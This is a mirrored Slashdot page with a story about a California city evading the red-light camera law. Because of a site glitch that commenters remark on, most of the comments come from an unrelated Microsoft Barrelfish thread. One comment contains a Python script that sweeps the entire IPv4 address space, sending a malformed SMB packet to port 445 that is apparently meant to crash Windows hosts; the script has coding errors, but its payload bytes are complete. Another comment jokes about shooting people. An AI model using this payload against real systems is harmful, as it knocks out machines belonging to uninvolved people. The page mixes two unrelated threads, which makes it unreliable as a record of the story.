Slashdot Mirror


CA City Mulls Evading the Law On Red-Light Cameras

TechDirt is running a piece on Corona, CA, where officials are considering ignoring a California law that authorizes red-light cameras — cutting the state and the county out of their portion of the take — in order to increase the city's revenue. The story was first reported a week ago. The majority of tickets are being (automatically) issued for "California stops" before a right turn on red, which studies have shown rarely contribute to an accident. TechDirt notes the apparent unconstitutionality of what Corona proposes to do: "The problem here is that Corona is shredding the Sixth Amendment of the US Constitution, the right to a trial by jury. By reclassifying a moving violation... to an administrative violation... Corona is doing something really nefarious. In order to appeal an administrative citation you have to admit guilt, pay the full fine, and then apply for a hearing in front of an administrative official, not a judge in a court. The city could simply deny all hearings for administrative violations or schedule them far out in advance knowing full well that they have your money, which you had to pay before you could appeal."

88 of 366 comments (clear)

  1. Ahhh by some_guy_88 · · Score: 5, Funny

    That slashdot outage was terrible. I almost got some work done..

    1. Re:Ahhh by mcgrew · · Score: 2, Funny

      I don't think it's over. The summary is talking about red light cameras in California, and all the comments are about Microsoft.

    2. Re:Ahhh by the_macman · · Score: 2, Funny

      Geez don't be so tough on them. One outage and they become useless. unloyal BASTARD!

  2. weird by Anonymous Coward · · Score: 2, Interesting

    This is an open source project, and just from some brief looks at the source they are using grub as the boot loader. This might be a new beginning for microsoft research.

    1. Re:weird by El_Muerte_TDS · · Score: 2, Informative

      Maybe it's because it's not just Microsoft who's working on that project. The other half of the team is from ETH Zurich Systems Group: http://www.systems.ethz.ch/ .

    2. Re:weird by ozmanjusri · · Score: 3, Interesting
      Not so weird really

      Firstly, this is a collaboration with ETH Zurich, not exclusively a Microsoft project, and secondly, the OS isn't available under any existing license. to quote:

      Excluding some third-party libraries, which are covered by various BSD-like open source licenses, Barrelfish is released under the following license (also included in the download):

      Copyright (c) 2007, 2008, 2009, ETH Zurich and Microsoft Corporation. All rights reserved.

      Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:

      1. * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
      2. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
      3. * The names of the authors may not be used to endorse or promote products derived from this software without specific prior written permission.

      It's great that this source will be open for study, at least at this early stage, but it's very likely to be locked away under copyright and/or patents by the time it becomes useful.

      --
      "I've got more toys than Teruhisa Kitahara."
    3. Re:weird by calmofthestorm · · Score: 2, Insightful

      MS Research is like a research university for all intents and purposes; they basically have academic latitude. Of course by the time the product reaches market it will be made, um..."better".

      --
      93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
    4. Re:weird by node+3 · · Score: 3, Insightful

      MS Research is like a research university for all intents and purposes; they basically have academic latitude. Of course by the time the product reaches market it will be made, um..."better".

      That's exactly it. MS Research is very much like a university except that their projects rarely make it out into the public in any meaningful and open way.

      I'm not begrudging MS keeping their projects to themselves, just pointing out that there is a fairly key distinction to be made here.

    5. Re:weird by Jacques+Chester · · Score: 2, Interesting

      If they publish papers about it, then it can't be patented. That's the first thing a patent lawyer asks: "Who have you told?".

      Followed by: "How much money do you have? Gimme!"

      --

      Classical Liberalism: All your base are belong to you.

  3. Messages eh? by negRo_slim · · Score: 3, Funny

    It's WM_PAINT all over again.

    --
    On the Oregon Cost born and raised, On the beach is where I spent most of my days
  4. As if any of this will see the light of day. by bmo · · Score: 3, Insightful

    3 "New Architechture" operating systems.

    Microsoft is getting more like the old Xerox and IBM every day.

    Xerox PARC: Create industry changing new technology that we hear about but never see. Never release.
    IBM of the 1980's: Fat, lethargic, bureaucracy driven.
    Microsoft right now: Both.

    I'm still waiting for Cairo.

    --
    BMO

    1. Re:As if any of this will see the light of day. by GreatBunzinni · · Score: 4, Insightful

      If you believe that barrelfish, midori and singularity are "new technology" then you don't have a clue about what has been done in the tech world. Microkernels? Done. OSs based/written in managed code? Done. Capabilities-based OSs? Done. What Microsoft is doing is reimplementing old concepts on Microsoft's own technology (C#, CIL, etc) and then using the test code that has been produced by those projects as a marketing tool. So when Windows is known to be plagued with security bugs and, therefore, viruses... Well, here comes Microsoft's marketing division clamouring this new singularity project, armed with it's press release which announces that Microsoft is building from the ground up an OS entirely devoted to security. Very convenient to dispel criticisms but still very irrelevant. So when Windows is known to have lacklustre support for multi-processor/multi-core systems... Well, here comes Microsoft's marketing division clamouring this new barrelfish project, armed with it's press release which announces that Microsoft is building from the ground up an OS entirely devoted to multi-core systems. Once again, very convenient to dispel criticisms but still very irrelevant. After all, although they announce so many of these research projects, all Microsoft is able to dump into the market is a series of Windows NT clones. So why is this even news?

      --
      Slashdot, fix your code or at least hire someone who is competent at it to do it for you.
    2. Re:As if any of this will see the light of day. by bmo · · Score: 2, Insightful

      What I was pointing out was what you're jumping down my throat about.

      Indeed, didn't I say I was still waiting for Cairo? Yes, I believe I did.

      Please take a fuckin' chill pill and say hello to your new status.

      Burning karma because I have it to burn.

      --
      BMO

    3. Re:As if any of this will see the light of day. by speedtux · · Score: 2, Insightful

      Well, if Microsoft's new OS can handle multi-core, multi-processor transparently for the applications

      No more than current OS'es. This OS simply claims to be internally more efficient.

      The thing I found quite elegant in Erlang is that it makes it so transparent

      Erlang really does little that you can't do as easily in other languages. The real value of Erlang is in what it lacks: it prevents you from doing things that are hard to distribute across cores.

      Imagine an OS with a "normal-looking" set of library that can handle all the hard works transparently. I'd say, bully to them.

      That's wishful thinking. "Normal-looking" code is "normal-looking" because it uses constructs that are intrinsically hard to parallelize.

  5. Re:direct CPU-CPU interconnects; Transputer? by bmo · · Score: 3, Interesting

    Imagine what might have happened if this actually got momentum behind it and we never went through the stagnation that is DOS/Windows.

    http://en.wikipedia.org/wiki/Atari_Transputer_Workstation

    --
    BMO

  6. Re:direct CPU-CPU interconnects; Transputer? by FCh · · Score: 4, Informative

    Transputers had 4 HW links -- those are probably the easiest part to replicate in current processors.
    The difficult part is the threading model: Transputers had their own thread model. Scheduler was hardwired in silicon, together with a couple of dedicated instructions. SW could not tell the difference between a local and a remote communication. Efficient, but not very flexible in terms of OS architecture.

  7. Queue the Microsoft OS Jokes by Pikoro · · Score: 3, Funny

    Making jokes for this OS should be as easy as shooting fish in a barrel...

    --
    "Freedom in the USA is not the ability to do what you want. It is the ability to stop others from doing what THEY want"
    1. Re:Queue the Microsoft OS Jokes by ZackSchil · · Score: 3, Funny

      Yes, we wouldn't want to be subjected to more than one at a time.

  8. Uhm... by BarrelFish · · Score: 2, Funny

    I'm at loss for words... I want to thank my mom, the cat, the postman, my cousin Gill - all those wonderful persons/animals/entities that made this possible. 'Cept Frank. Screw you, Frank.

    1. Re:Uhm... by Anonymous Coward · · Score: 2, Funny

      I'm at loss for words... I want to thank my mom, the cat, the po..hold on a second, ima let you finish but microsoft has developed one of the best operating systems of all time!!!

  9. It's multicore as in i386+amd64+ARM+GPU by Janek+Kozicki · · Score: 3, Interesting
    --
    #
    #\ @ ? Colonize Mars
    #
  10. Genuine innovation by Max+Romantschuk · · Score: 4, Insightful

    Say what you want about Microsoft, but their research division does a hell of a lot of genuine innovation.

    This is an important problem area for future software systems, great that alternative approaches are being looked at. More power to them.

    --
    .: Max Romantschuk :: http://max.romantschuk.fi/
    1. Re:Genuine innovation by 1s44c · · Score: 3, Insightful

      Say what you want about Microsoft, but their research division does a hell of a lot of genuine innovation.

      I don't think so. I'll give them credit for trying really hard and for having a huge budget though.

      Can you give a few examples of really original research? Everything I've seen was either trivial or a rehash of old mainframe ideas. Not that I'm saying there is anything wrong with old mainframe ideas but it's hardly 'genuine innovation'.

    2. Re:Genuine innovation by antifoidulus · · Score: 4, Informative

      By Genuine Innovation you mean "doing stuff Sun was doing well over a decade ago?" Sounds pretty innovative to me.

    3. Re:Genuine innovation by 1s44c · · Score: 3, Insightful

      By Genuine Innovation you mean "doing stuff Sun was doing well over a decade ago?" Sounds pretty innovative to me.

      I think the 'Genuine Innovation' bit comes in when they lie about having done it first in some huge expensive marketing campaign.

    4. Re:Genuine innovation by 1s44c · · Score: 4, Insightful

      .net is their only real innovation that comes to mind.

      In what way is .net an innovation? It's not an innovation without being new in some way.

      MS's real strength is in their ability to take technologies and make them easy to use, consistent and reliable.

      No. Their real strength is marketing, sales, strongarming hardware suppliers, and consumer ignorance. Their software isn't easier to use or more consistent than anything else and it certainly isn't more reliable. Actually it is shockingly unreliable.

      Ever had to deal with active directory? Chain crashes of multiple machines do happen and application level errors often cause a blue screen and leave no logs to indicate what went wrong. In big environments bugs like that cost a few million a day and they happen every day. Companies pay a fortune just to cover things like that up, it happens everywhere.

      Ever seen a virus wipe out over a thousand production servers in a day? I have on windows but never on anything unix based.

    5. Re:Genuine innovation by CxDoo · · Score: 2, Interesting

      Wow, that's some heavy shit you've been smoking.

      Ease of use is their no 1 selling point, no one comes even close. If there were easily deployable and maintainable alternatives to their products they would at least start penetrating the small business market, which is where easy & cheap are the king.

      Ever wonder why Random Small Company uses Windows stack all the way when they don't _really_ need full blown Active Directory, Exchange & SQL Server? It is not because they're stupid and don't know better. It's because it is _cheaper_ to deploy & maintain SBS with 5 licenses and have Joe The Point & Click Administrator come show them how to click their way through 10 scenarios they'll need to handle than to look for, employ and be afraid of Linux (or whatever) Guru, not to mention that they'll need to retrain everyone from Office stack to whatever combination they'd need. And what for? Have you even seen what is the price of Small Business Server?
      As I said, not even close.

      And when it gets close, MS will start giving SBS for free. Can't beat them on price. You have to beat them on easy.

      --
      "Blah blah blah." - [citation needed]
    6. Re:Genuine innovation by 1s44c · · Score: 2, Informative

      Ease of use is their no 1 selling point

      Indeed. It's a selling point, but that doesn't make it true. It's just what their marketing claims and what people that don't really know IT believe because they have little other information on which to base their choices.

      You claim it's easier to deploy windows and I'm not disagreeing with you. What I'm saying is that total cost of ownership, including additional costs like downtime are higher with windows in almost every case and in many cases they are a great deal higher. Losing the use of email or losing a few websites at an unexpected time is something customers will notice and will judge you on. Losing your whole user authentication system in the middle of a business day can cost a fortune. It might just make the difference between profit and bust.

      I never said people that use windows are stupid. In most cases they just stick to what they know and what the adverts tell them they should use. They believe any companies who sells stuff thats used so widely has to be good, sadly that is bad reasoning.

    7. Re:Genuine innovation by 1s44c · · Score: 4, Interesting

      I think the 'Genuine Innovation' bit comes in when they lie about having done it first in some huge expensive marketing campaign.

      Can you provide an example of this ?

      I can provide a few.

      MS-DOS was QDOS brought and rebranded. MS didn't create it yet they told everyone they did.

      The windows desktop environment was a mac or PARC or X clone, not sure which. It wasn't new but they pushed it like it was.

      The Windows NT OS was reimplementation of VMS and UNIX systems, only not done nearly as well as either. They called it NT for New Technology and marketing it as the stable 'business' alternative to dos based windows.

      Excel was a Lotus 1-2-3 clone. The pivot tables accountants love so much were copied from Lotus too. They sell their office package like crazy but they didn't develop the core of it.

      Word was a wordstar clone.

      Internet Explorer was a mosaic clone. Although MS are giving it away for nothing they are still marketing it like crazy.

      Active Directory is just a LDAP clone. They market it as something which will solve all the worlds problems.

    8. Re:Genuine innovation by RiotingPacifist · · Score: 4, Interesting

      Can you provide details on how to replicate this behaviour ?

      Install python
      run:
      #!/usr/bin/python
      from socket import socket
      from time import sleep

      while True:
              for a in 255:
                      for b in 255:
                              for c in 255:
                                      for d in 255:
                                      ip_addr = a+"."+b+"."+c+"."+d
                                      host = id_addr, 445
                                      buff = (
                                      "\x00\x00\x00\x90" # Begin SMB header: Session message
                                      "\xff\x53\x4d\x42" # Server Component: SMB
                                      "\x72\x00\x00\x00" # Negociate Protocol
                                      "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
                                      "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
                                      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                                      "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
                                      "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
                                      "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
                                      "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
                                      "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
                                      "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
                                      "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
                                      "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
                                      "\x30\x30\x32\x00"

                                      )
                                      s = socket()

                                      s.connect(host)
                                      s.send(buff)
                                      s.close()

      --
      IranAir Flight 655 never forget!
    9. Re:Genuine innovation by Anonymous Coward · · Score: 2, Informative

      Dude, "innovating" means you're doing something unique, for the first time. Have you ever read a Microshit press release without "innovation" and other bullshit sprinkled all over it? I haven't. Thus, they said it. And they lied. They are not innovative in any way shape or form other than as unusually bold, brazen, arrogant asshole scofflaws with legions of braindead zombie-defenders who should never have been allowed to touch a keyboard.

    10. Re:Genuine innovation by timmarhy · · Score: 2, Insightful
      .net is innovative in the sense it's a worthy competitor to java. while you could argue .net isn't truely innovative because it fills the same niche that java did years before, you'd be vastly understating the work that went into the .net framework and not understanding how they've done things differently. remmeber innovation isn't finding new problems, it's finding new solutions to problems.

      To answer your question i use AD daily at work - it's fine. i haven't ever had a single problem with it going back to 2000. it's always done exactly what it's supposed to. at the moment i run windows 2003 server and sql server 2005. while i'm not 100% satisfied with reporting services, it's still well ahead of anything OSS has to offer and cheaper then buying crystal reports. with the exception of service packs windows server 2003 hasn't ever needed a restart or crashed. the only issues i've ever had have been flaky 3rd party apps.

      you retreat into the tired old fanboy nonsense of accusing me of having an MS pr play book - that's total bullshit, there are great OSS projects i have used and am a fan of. python, postgresql and apache to name some.

      what i can't stand is OSS people who refuse point blank to consider MS has done anything right. for fucks sake, they are the market leader, they must be doing something right. i want better software, not your ideology.

      --
      If you mod me down, I will become more powerful than you can imagine....
  11. Big companies CAN'T change direction by 1s44c · · Score: 4, Insightful

    Microsoft is far to big to change direction. They are a marketing company trying to wring every last penny out of windows and related tools. They have never been a technology company and trying to change now will do nothing but burn vast sums of money. Windows is obsolete and they know they have to replace it but they will never be able to come up with anything better.

    They could develop new and better OS's at a fraction of their current research costs by simply giving cash to universities to do the work and keeping their hands off the projects. Sadly they can't think like that.

    1. Re:Big companies CAN'T change direction by 7+digits · · Score: 3, Insightful

      I am always amazed that people can be both assertive and utterly wrong. I despise Microsoft, for a variety of reason, but that isn't a reason to be blind at their qualities:

      > Microsoft is far to big to change direction.

      Internet, WindowsNT, XBox are counter examples. Microsoft is one of the most agile company out there. A lot of dead / moribond companies and a lot of products are there to serve as a warning to others.

      > They have never been a technology company

      I beg to differ. It is possible to argue that their are not a technology company anymore, but not that they never were

      > They could develop new and better OS's at a fraction of their current research costs by simply giving cash to universities to do the work and keeping their hands off the projects

      To build an OS that they would get no benefits of ? Wtf? And why does MS would need a new OS ? What is wrong with the current OS model ? They need better apps, they need better subsystems, they need to remove cruft and to clean up stuff, but the core OS is still fine for its uses and can be improved by evolutions.

      They just need Microsoft Research for a few things, mainly:
      * To prevent people working here from working elsewhere, where they could create and apply disruptive technology.
      * To get ideas that may or may not integrated into products (given the origins of the talking paperclip, the latter may be better)
      * To have a better time-to-market IF they needed to produce something due to some disruptive tech appearing from competitors

      Giving cash to university and keeping their hands off the projects obviously wouldn't make any sense

  12. amused... by madenglishbloke · · Score: 5, Funny

    Please tell me I'm not the only one amused by the whole "best built on Debian or Ubuntu, 'cos thats what we use" part of the README...

  13. I've seen this before... by mcrbids · · Score: 5, Interesting

    It was more of a programming language than an Operating System, but ERLANG has the stuff to do multi-core, well. Using ERLANG, they've actually achieved nine nines of uptime. That works out to well under a SECOND of downtime in a year. It scales (near) linearly as the number of cores go up, IO is the limitation.

    You can read all about it here. Concepts like message passing and immutability is what makes it work.

    Erlang actually lets you update the program while it's running. It has extensive error recovery. It's lack of shared state means you can not only go multi-core, but multi-system over networks - invisibly.

    Seriously, It's the cat's meow for ultra-high-end high-performance, industrial-grade software solutions. If I were writing a stock exchange management system, I would probably consider ERLANG.

    --
    I have no problem with your religion until you decide it's reason to deprive others of the truth.
  14. Multicore, or clusters? by Shag · · Score: 3, Interesting

    It's a little hard to determine whether this is actually about discrete multicore systems, or heterogenous clusters. Sure, a single conventional machine is likely to have both CPU and GPU, but it's less likely to have x86_64, x86 and CPUs. So to some extent, I suspect heterogenous clusters. In the case of a single box, this would come across as a massive prototyping effort simply to avoid supporting an open-tracked standard (OpenCL).

    --
    Village idiot in some extremely smart villages.
  15. Windows vs Mac by Anonymous Coward · · Score: 4, Funny

    When Microsoft wonders why Mac is perceived and cool and Windows isn't take a clue from their naming conventions. Barrelfish vs Snow Leopard. Can you spot the cooler name? After Vista flopped the marketing department went out and got drunk and said "aw fuck it, we'll just call the next one Windows 7". Just kind of feels like they really aren't even trying.

    1. Re:Windows vs Mac by CxDoo · · Score: 2, Funny

      Snow Leopard is a kind of "I'm not gay" gay name. Vista too, that's why it failed with general populace.

      Windows 7 is a step in the right direction. I expect them to name the next one Windows.NT8.2.1043_X64.
      That's a cool name and definitely not gay. It would also ring nice with FOSS crowd.

      --
      "Blah blah blah." - [citation needed]
  16. Looking for a good research OS by OrangeTide · · Score: 2, Interesting

    I would like something that is a combination of Inferno/Plan9(styx is nice) and Erlang as a stand-alone OS. Throw in any other cool features for good multiprocessor and high performance clustering and fault tolerance. (Although if Erlang-like, I would like some better syntax, it's a little hairy). The idea of being able to scale to 20 million threads on one system efficiently with Erlang is intriguing, although I estimated that it would take about 48GiB of RAM to just have the stack data. But that's not so bad, it's pretty easy to find an affordable server motherboard that can accept 64GiB of RAM. (installing all that RAM is moderately expensive though)

    --
    “Common sense is not so common.” — Voltaire
  17. Nice... by M-RES · · Score: 2

    Isn't it a shame that after all the hard work the devs put into great ideas like this at MS, once the accountants and marketers get their hands on it it comes out the doors like Vista! There's something seriously wrong with the workflow in that company...

  18. Re:efficient use of multicore hardware... by Anonymous Coward · · Score: 2, Informative

    have you ever written anything in CUDA?

  19. Re:efficient use of multicore hardware... by calmofthestorm · · Score: 2, Informative

    Yeah turns out this problem is really hard and, depending on how you formalize it, uncomputable. What it boils down to is that the system needs to know how long it will take to run a program on itself and how long it will take to spin it off into another thread.

    Sound familiar? It should; that's halt.

    Of course, approximating it well is an interesting research problem in language theory, but I wouldn't expect a general purpose system in actual production use any time soon. Even doing it in a pure, strongly typed language will be extremely difficult; implementing one for something like Java/C[++] will be far harder. And of course the ultimate win is doing it to machine code.

    --
    93rd rule of Slashdot: No matter how obvious my sarcasm is, my comment will be taken seriously by someone.
  20. I'm shocked by bcmm · · Score: 4, Funny
    From TFA:

    This web page was brought to you by a server running Barrelfish.

    At last a TFA which is actually hosted on the system it's talking about, and it refuses to break so we can make "It must be running Barrelfish" jokes. Maybe it really is efficient.

    --
    # cat /dev/mem | strings | grep -i llama
    Damn, my RAM is full of llamas.
  21. Re:Grand Central Dispatch? by heffrey · · Score: 3, Informative

    Clearly you have no idea what GCD is.

  22. Re:direct CPU-CPU interconnects; Transputer? by RiotingPacifist · · Score: 2, Interesting

    Imagine what might have happened if this actually got momentum behind it and we never went through the stagnation that is DOS/Windows.

    I think i just came a little.

    --
    IranAir Flight 655 never forget!
  23. Re:direct CPU-CPU interconnects; Transputer? by Haxamanish · · Score: 3, Insightful

    I've seen an ATW at work in the late 80s. My Archimedes could calculate a mandlebrot set in about 30 seconds, a PC needed several minutes for that. The ATW could zoom in and out mandlebrots _in real time_ and one fly through them like through a 3D-world, I was really stunned when I saw that.

  24. Re:direct CPU-CPU interconnects; Transputer? by speedtux · · Score: 3, Informative

    "Marshalling" means converting data structures into byte streams. No, you didn't have to do that multiple times. The term you're looking for is "routing". Routing can be abstracted into libraries and the OS; no need for every application to worry about it. It was just that the Transputer (as well as a lot of other system software development) was killed when Microsoft monopolized the market.

  25. Re:Grand Central Dispatch? by MrHanky · · Score: 3, Funny

    No, but as an Apple fanboy, he's automatically +5.

  26. Re:Grand Central Dispatch? by pwfffff · · Score: 2, Funny

    What does the global cooldown have to do with anything? We're not casting spells here.

  27. Re:direct CPU-CPU interconnects; Transputer? by amliebsch · · Score: 2, Insightful

    The IBM-PC may have been a turd in comparison, but it was a turd that cost a tenth of the price while still doing most of what people needed a computer to do. So, it was a cost-efficient turd. That meant that companies could afford to computerize much more of their workforce, sooner, and that more families could get a computer, earlier. And I don't think that's sad at all.

    --
    If you don't know where you are going, you will wind up somewhere else.
  28. Slashcode is Farked... by MadCow42 · · Score: 4, Informative

    How did I end up in the Windows 7 thread from the "CA City Mulls Evading the Law On Red Light Cameras" article? It even shows that in the address bar, so I'm not crazy here...

    --
    I used to have a sig, but I set it free and it never came back.
    1. Re:Slashcode is Farked... by rotide · · Score: 3, Informative

      Not crazy, happening here too. Read the second real comment on the page and wondered how in the hell it was modded +5 Interesting and not Off-Topic.

    2. Re:Slashcode is Farked... by emm-tee · · Score: 5, Funny

      How did I end up in the Windows 7 thread from the "CA City Mulls Evading the Law On Red Light Cameras" article? It even shows that in the address bar, so I'm not crazy here...

      I don't know, but I suspect the "duct tape programmer" story might be related somehow..

  29. Wrong comments? by edsousa · · Score: 5, Informative

    What the hell is going here? I see a story about Corona CA evading the law on red-light cameras and comments (and tags) are about some MS story?

    1. Re:Wrong comments? by sopssa · · Score: 5, Funny

      Everyone decided it was uninteresting and now we're talking about Windows 7 and Microsoft instead.

    2. Re:Wrong comments? by bill_mcgonigle · · Score: 2, Funny

      What the hell is going here? I see a story about Corona CA evading the law on red-light cameras and comments (and tags) are about some MS story?

      Somebody please start some threads about random conspiracy theories - they'll get lots of hits and really confuse the hell out of everybody.

      --
      My God, it's Full of Source!
      OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
  30. Re:prefilled comments by Kell+Bengal · · Score: 3, Insightful

    Just be glad they aren't outsourcing them to Digg.

    --
    Scientists point out problems, engineers fix them
    altslashdot.org: The future of slashdot.
  31. Single-article mode by Qubit · · Score: 2, Funny

    Oh, goody, my account thinks that my previous comment is attached to the Microsoft Releases Prototype of Research OS "Barrelfish story. Brilliant!

    I think that somehow /. just got rebooted into single-article mode. All the comments and all the stories are merged together. Maybe it's a cost-saving measure, cutting down on use of electrons and such...

    --

    coding is life /* the rest is */
  32. What the.... by RingDev · · Score: 5, Interesting

    I don't know what the outage was, but why am I reading comments about open source code, routing, and marshaling in the comments about a constitutional overstep by a local municipality in CA?

    -Rick

    --
    "Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
    1. Re:What the.... by the_macman · · Score: 3, Funny

      World of Slashdotcraft: Cataclysm

    2. Re:What the.... by SleazyRidr · · Score: 2, Funny

      I just assumed it was the regular /. meandering of topics, and I just didn't see the grandparent post.

  33. Re:Administrative violations are unconstitutional by Sparr0 · · Score: 2, Insightful

    The "exception" is that they are pretending that this is not a fine for a crime, but instead is a fee for a non-crime interaction with the govt. You don't need a jury trial to tell you that [any non-criminal interaction with the DMV or court clerk or registrar] is going to have a fee attached to it. They are trying to put this "fee" for keeping your driver's license after a violation in the same category as the fee for getting your driver's license in the first place.

  34. Re:"Green Arrow". by godrik · · Score: 4, Informative

    In the US (not all the state I think), there is turn-on-red which means you can always turn right (provided you are on the most right lane) but you must yield if the traffic light is red. Turn on red is the common thing and it is specified when it is forbidden. Whereas in France, the opposite is used : you can not turn unless the right green arrow is lit.

    I believe the rule is turn on red in the US because the roads are new and built with good visibility. When there is no visibility turn on red is forbidden. Whereas in France at most intersections turn on red would be dangerous due to the lack of visibility. Therefore turn on red is the exception.

  35. Administrative violation as an advantage by EsJay · · Score: 2, Insightful

    The lack of a moving violation has an advantage for the motorist. Here in Illinois, red-light tickets do not affect your driving record or insurance rates.

    As a bicyclist in a city where red lights mean "four more cars!", I was happy to see the red light cameras arrive. Even after getting a ticket as a driver. The on-line video of my violation was educational - it looked like an audition for "Cops". I'm a lot more careful now.

  36. Re:"Green Arrow". by DaveV1.0 · · Score: 2, Informative

    We have green right turn arrows here. They mean it is safe to turn right on red without stopping. They only light if there should not be any on-coming traffic and the pedestrian light is "Don't walk". Otherwise, unless posted, one can turn right on red, provided one follows the same rules you have listed.

    --
    There is no "-1 offended" or "-1 you don't agree with me" mod options for a reason.
  37. Two stories beat as one by Shimmer · · Score: 4, Funny

    I've seen many spectacular Slashdot screwups over the years, but this is a new one. Well done, guys!

    --
    The most rabid believers in American Exceptionalism are the exact same people whose policies are destroying it.
  38. Other states do it as well by guruevi · · Score: 4, Informative

    (Red light story) - PA already does it in many cities/villages. You are required to pay a $50 non-refundable 'administrative' fee in order to be able to present your case to a judge and the judge will usually give you a reduction on the fine even if you have a good case (cop always wins). Given that the fines are somewhere between $75 and $150, it's not even worth going in.

    NY does it also in large cities. You don't even go to a judge anymore, you go to an administrator at the Traffic Violations Bureau who decides how much you have to pay, no plea bargaining, no judges.

    --
    Custom electronics and digital signage for your business: www.evcircuits.com
    1. Re:Other states do it as well by Technician · · Score: 3, Interesting

      I think one way to fight this is to use the approach that some cyclists use in the "Critical Mass" approach to cycling safety.

      If a grass roots protest was formed by simply stopping at ALL red lights and waiting for a green would soon gridlock traffic. Until the tickets go away for turning on red, not turning on red to avoid the new tax is the solution to show the impact it has on drivers. Stopping for the red and waiting for the green saves you the ticket as well as the line behind you.

      --
      The truth shall set you free!
  39. Right to a jury?! by matunos · · Score: 2, Interesting

    Where in this country does someone have a right to a jury for a moving violation? Right to a jury is guaranteed only for criminal cases. Traffic infractions are not criminal infractions unless they rise to a misdemeanor level.

    1. Re:Right to a jury?! by bhtooefr · · Score: 2

      Well, moving violations should theoretically be either criminal, or the entire road system privatized (hey, it wouldn't be any worse than the special grade of government corruption plus private contractors providing maintenance) to separate moving violations from criminal violations properly.

      Of course, you could argue for the reasons behind jury trials - the end results of a criminal trial can literally ruin your life. Let's say you lose your driver's license to multiple false moving violations - unlikely, but possible, and it probably has happened. Now, the only practical way to get to work for a lot of people is to illegally drive, which is an actual criminal offense, and you'd be guilty of it. So, your life gets ruined either way. That's an argument for moving violations to allow for jury involvement right there...

      But, this article isn't about moving vs. criminal, it's about administrative vs. moving. You at least get to face a judge, only paying court costs if you lose, with the (theoretical) presumption of innocence, in a moving violation case. In an administrative violation case, you pay the fine up front, ADMIT GUILT, and THEN get to appeal to someone who isn't a judge. Granted, an administrative violation won't cause points on your license, but they can nickel and dime the hell out of you, it's harder (or impossible) to fight (and nonpayment is a criminal violation,) and administrative violations are rarely about safety, but rather revenue generation. Law enforcement should not be a profit center - if there are profits, fine, but those should not be relied on, put the funds from law enforcement profits into a rainy day fund, don't rely on them in your budget, and don't encourage profits (read: make the law difficult to not violate, and/or hard to fight.)

    2. Re:Right to a jury?! by pthisis · · Score: 3, Informative

      If it's a criminal case, Amendment VI provides a right to a jury.

      If it isn't, and the amount at stake is over $20, Amendment VII provides it.

      The bolded portion is wrong. Amendment VII only provides the right to a jury in civil suits, not in all non-criminal trials.

      The distinction is important because at the time the Constitution was written there was a difference between petty crimes and so-called criminal offenses--the former were not afforded a jury trial under common law, while the latter were.

      While petty crimes are, today, lumped in with criminal offenses in many ways, the distinction still remains when it comes to determining whether a jury trial is required or not.

      See Petty Federal Offenses and the Constitutional Guaranty of Trial by Jury, 39 Harv.L.Rev. 917, 922-965, 983-1019, or the summary of the law visible in Google books here:
      http://books.google.com/books?id=pkb9HLOzeTcC&lpg=PT396&ots=chYy4WR8ii&dq=Petty%20Federal%20Offenses%20and%20the%20Constitutional%20Guarantee%20of%20Trial%20by%20Jury&pg=PT395#v=onepage&q=&f=false

      --
      rage, rage against the dying of the light
  40. Pre-Taped Call-In Show by tholomyes · · Score: 4, Funny

    "Look, if you wanted to talk about pet care, you should've called two weeks ago when our show on racism was airing. Okay, I'm doing a show about the elderly right now, which of course, to people watching means: call in about cooking..."

    --
    When did the future switch from being a promise to a threat? -C. Palahniuk
  41. Re:why arent the Feds/state gov stepping in? by cdrguru · · Score: 2, Interesting

    The problem is that only by an extremely strict interpretation to red-light cameras violate the constitution. What people aren't saying here is that under the Sixth Amendment theory, all red-light cameras, speed cameras, photo radar, doppler radar and LIDAR systems violate the Sixth Amendment because you can't cross-examine a radar gun. Or a red-light camera. If that is the device that is actually accusing you of speeding, what are you supposed to do?

    Well, nobody in the government actually believes in that interpretation. Try to defend yourself against a speeding ticket using this defense and you will be laughed out of court.

    The problem is that if we allow the police to use any tools other than their eyes to enforce the law we will be subject to these tools having significant, if not sole, input into a prosecution. I would say you have the same problem when a mass spectrometer is used and the results clearly identify a person has having been in contact with a murder weapon. Can you cross-examine the mass spectrometer? No? Then obviously the case must be thrown out. Might as well pass a law against technology in law enforcement.

    Obviously the Sixth Amendment argument is pointless.

    Now, evidently in this case California state law insists on revenue sharing for red light cameras and this city wants to ignore the revenue sharing and keep all the money. This is hardly a legal matter but a state administrative issue and isn't going to affect anything except how the money is disbursed from red light camera fines. Some hearing panel in Sacramento will have to deal with this.

  42. I'm outraged! by KingSkippus · · Score: 4, Funny

    This just goes to show, you can't count on big companies to do what's right. If there were more freedom and openness, we'd be a lot better off. Between Microsoft's FUD and Apple's fanboys, it's a wonder anything gets done.

    Hopefully, once people realize what's going on and the Pirate Party gains ground and push back the anti-evolution religious nuts, everything will be much better.

    There, that should milk a few karma points no matter what Slashdot article this comment ends up under.

    1. Re:I'm outraged! by commodore64_love · · Score: 2, Insightful

      You're right!

      What we need to do is surround the building and remind this town's legislators who gave them their job. This bullshit red-light ticketing without a trial needs to end.

      Then once that's done, we'll surround the headquarters of RIAA and shoot anyone who tries to leave the building. (Or until the police show up.)

      --
